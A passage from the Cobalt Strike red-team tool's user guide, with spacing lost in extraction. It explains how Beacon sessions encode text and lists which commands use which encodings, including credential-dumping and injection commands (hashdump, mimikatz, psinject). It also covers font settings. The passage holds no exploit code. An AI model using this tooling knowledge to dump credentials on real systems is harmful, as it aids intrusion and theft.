Unicodevariants.AnANSIvariantofanAPIacceptsandinterpretsatextargumentasdescribed
|
||
above.AUnicodeWin32APIexpectstextargumentsthatareencodedwithUTF-16.
|
||
InWindows,therearemultipleencodingsituationspossible.There'sOEMencodingwhichcan
|
||
representsometextinthetarget'sconfiguredlanguage.There'sANSIencodingwhichcan
|
||
representmoretext,primarilyinthetarget'sconfiguredlanguage.And,there'sUTF-16which
|
||
cancontainanycode-point.There'salsoUTF-8whichisavariable-lengthencodingthat'sspace
|
||
efficientforASCIItext,butcancontainanycode-pointtoo.
|
||
Beacon
|
||
CobaltStrike'sBeaconreportsthetarget'sANSIandOEMencodingsaspartofitssession
|
||
metadata.CobaltStrikeusesthesevaluestoencodetextinput,asneeded,tothetarget's
|
||
encoding.CobaltStrikealsousesthesevaluestodecodetextoutput,asneeded,withthe
|
||
target'sencoding.
|
||
CobaltStrikeUserGuide www.fortra.com page:474
|
||
|
||
Appendix/UnicodeSupport
|
||
Ingeneral,thetranslationoftexttoandfromthetarget'sencodingistransparenttoyou.Ifyou
|
||
workonatarget,configuredtoonelanguage,thingswillworkasyouexpect.
|
||
Differentbehaviors,betweencommands,willshowupwhenyouworkwithmixedlanguage
|
||
environments.Forexample,ifoutputcontainscharactersfromCyrillic,Chinese,andLatin
|
||
alphabets,somecommandswillgetitright.Otherswon't.
|
||
MostcommandsinBeaconusethetarget'sANSIencodingtoencodeinputanddecodeoutput.
|
||
Thetarget'sconfiguredANSIencodingmayonlymapcharacterstocode-pointsforahandfulof
|
||
writingsystems.IftheANSIencodingofthecurrenttargetdoesnotmapCyrilliccharacters,
|
||
make_tokenwillnotdotherightthingwithausernameorpasswordthatusesCyrillic
|
||
characters.
|
||
Somecommand,inBeacon,useUTF-8forinputandoutput.Thesecommandswill,generally,
|
||
dowhatyouexpectwithmixedlanguagecontent.ThisisbecauseUTF-8textcanmap
|
||
characterstoanyUnicodecodepoint.
|
||
ThefollowingtabledocumentswhichBeaconcommandsusesomethingotherthantheANSI
|
||
encodingtodecodeinputandoutput:
|
||
Command Input Encoding Output Encoding
|
||
hashdump UTF-8
|
||
mimikatz UTF-8 UTF-8
|
||
powerpick UTF-8 UTF-8
|
||
powershell UTF-16 OEM
|
||
psinject UTF-8 UTF-8
|
||
shell ANSI OEM
|
||
NOTE:
|
||
Forthosethatknowmimikatzwell,you'llnotethatmimikatzusesUnicodeWin32APIs
|
||
internallyandUTF-16characters.WheredoesUTF-8comefrom?CobaltStrike'sinterface
|
||
tomimikatzsendsinputasUTF-8andconvertsoutputtoUTF-8.
|
||
SSH Sessions
|
||
CobaltStrike'sSSHsessionsuseUTF-8encodingforinputandoutput.
|
||
Logging
|
||
CobaltStrike'slogsareUTF-8encodedtext.
|
||
CobaltStrikeUserGuide www.fortra.com page:475
|
||
|
||
Appendix/UnicodeSupport
|
||
Fonts
|
||
Yourfontmayhavelimitationsdisplayingcharactersfromsomewritingsystems.Tochange
|
||
theCobaltStrikefonts:
|
||
GotoCobalt Strike -> Preferences -> Cobalt StriketochangetheGUIFontvalue.Thiswill
|
||
changethefontCobaltStrikeusesinitsdialogs,tables,andtherestoftheinterface.
|
||
GotoCobalt Strike -> Preferences -> ConsoletochangetheFontusedbyCobaltStrike's
|
||
consoles.
|
||
Cobalt Strike -> Preferences -> GraphhasaFontoptiontochangethefontusedbyCobalt
|
||
Strike'spivotgraph.
|
||
CobaltStrikeUserGuide www.fortra.com page:476
|